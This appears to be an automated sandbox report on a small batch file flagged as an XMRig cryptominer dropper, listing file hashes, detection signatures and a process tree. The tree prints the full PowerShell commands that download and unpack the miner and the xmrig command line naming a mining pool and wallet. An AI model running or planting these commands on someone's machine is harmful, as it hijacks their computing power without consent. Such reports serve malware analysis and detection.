xmrig | 04cf0194fb37bcc19b2b63904d84a74c720b64b7938620fdf971bb98a8f47ccd

Analysis

max time kernel
6s
max time network
295s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
22/12/2023, 05:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tesy - Copy (4).bat
Size

608B
MD5

727c8da0478af118c957ae60f7161cab
SHA1

cf18105b8659e93bbd2824fa35ef1bae7b395301
SHA256

97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab
SHA512

d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

Score

10^/10

xmrig miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip

Signatures

XMRig Miner payload 8 IoCs

miner

resource	yara_rule
behavioral16/files/0x0006000000023233-57.dat	family_xmrig
behavioral16/files/0x0006000000023233-57.dat	xmrig
behavioral16/memory/2632-60-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp	xmrig
behavioral16/memory/2632-63-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp	xmrig
behavioral16/memory/2632-64-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp	xmrig
behavioral16/memory/2632-67-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp	xmrig
behavioral16/memory/2632-68-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp	xmrig
behavioral16/memory/2632-69-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	1476	powershell.exe
7	1476	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1476	powershell.exe
1476	powershell.exe
4492	powershell.exe
4492	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1476	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4720 wrote to memory of 1476	4720	cmd.exe	27
PID 4720 wrote to memory of 1476	4720	cmd.exe	27
PID 4720 wrote to memory of 4492	4720	cmd.exe	92
PID 4720 wrote to memory of 4492	4720	cmd.exe	92

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (4).bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4492
- C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
  xmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
  2⤵
  PID:2632

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
49e7d5f2a296b59afec08bc314bed998

SHA1
7f898bf195ffd46ce2d19fad0ce33155f6e47f5f

SHA256
394832dfefa5e2e6204b60708a2ca33bb9d2f529664419bc050975f4b80faefe

SHA512
f64579fdac0bfebad4c20ad575b8ea45136e295fba950da4cbf84402228a3897b2e2deb4eb4605deb5df93321b1dc15c8a878da36016d7e5e060182142fdf839

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1x1ljwjw.3vp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0-gcc-win64.zip

Filesize
195KB

MD5
e0db3e9a9cacc821b80cae866bb8aa0d

SHA1
4fe4265d15a98fc4ee13ecce8818bff317d29159

SHA256
7a538b3e0c84158ba3b93fb47541163263134ea91fbf292752b79fed3b70ac27

SHA512
6b375dcf7de5e5a6bff76341ded6ff5f39acc4c9c0825d16de8b86181d703a587e22a460387f36fcb8321c01d1332ce3a7266acfd01f2456a1e5754ba3a3fce6

Download Submit
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Filesize
149KB

MD5
dd017061867a7aaef4a18fd5f6eabea4

SHA1
abce62f68b376d1273f49b24a26eb895614f9ab6

SHA256
9488291fc6de596056172bb5245c322bb3431ca132f03fe8ac190e620758d5d6

SHA512
922544ff45636a0551f43c544dd3b0440a5d2eb0e12546bd8be9d54c5646eea14db72e5d8537a55e3c977dc8337251da30ae7a5c7009a3cfd7fd6f7a3cb0bfeb

Download Submit
memory/1476-9-0x0000024845B90000-0x0000024845BB2000-memory.dmp

Filesize
136KB

Download
memory/1476-11-0x000002482D370000-0x000002482D380000-memory.dmp

Filesize
64KB

Download
memory/1476-10-0x00007FF828890000-0x00007FF829351000-memory.dmp

Filesize
10.8MB

Download
memory/1476-15-0x00007FF828890000-0x00007FF829351000-memory.dmp

Filesize
10.8MB

Download
memory/2632-78-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-72-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-92-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-91-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-90-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-89-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-88-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-58-0x000002A09F260000-0x000002A09F280000-memory.dmp

Filesize
128KB

Download
memory/2632-59-0x000002A09F2B0000-0x000002A09F2F0000-memory.dmp

Filesize
256KB

Download
memory/2632-60-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-62-0x000002A0A0BC0000-0x000002A0A0BE0000-memory.dmp

Filesize
128KB

Download
memory/2632-61-0x000002A0A0BA0000-0x000002A0A0BC0000-memory.dmp

Filesize
128KB

Download
memory/2632-63-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-64-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-66-0x000002A0A0BC0000-0x000002A0A0BE0000-memory.dmp

Filesize
128KB

Download
memory/2632-65-0x000002A0A0BA0000-0x000002A0A0BC0000-memory.dmp

Filesize
128KB

Download
memory/2632-67-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-68-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-69-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-70-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-71-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-87-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-73-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-74-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-75-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-76-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-77-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-86-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-79-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-80-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-81-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-82-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-83-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-84-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/2632-85-0x00007FF7A2710000-0x00007FF7A3213000-memory.dmp

Filesize
11.0MB

Download
memory/4492-26-0x00007FF828C10000-0x00007FF8296D1000-memory.dmp

Filesize
10.8MB

Download
memory/4492-27-0x0000023E9CA30000-0x0000023E9CA40000-memory.dmp

Filesize
64KB

Download
memory/4492-30-0x0000023E9CA30000-0x0000023E9CA40000-memory.dmp

Filesize
64KB

Download
memory/4492-55-0x00007FF828C10000-0x00007FF8296D1000-memory.dmp

Filesize
10.8MB

Download
memory/4492-31-0x0000023E9D4B0000-0x0000023E9D4C2000-memory.dmp

Filesize
72KB

Download
memory/4492-32-0x0000023E9D310000-0x0000023E9D31A000-memory.dmp

Filesize
40KB

Download
memory/4492-28-0x0000023E9CA30000-0x0000023E9CA40000-memory.dmp

Filesize
64KB

Download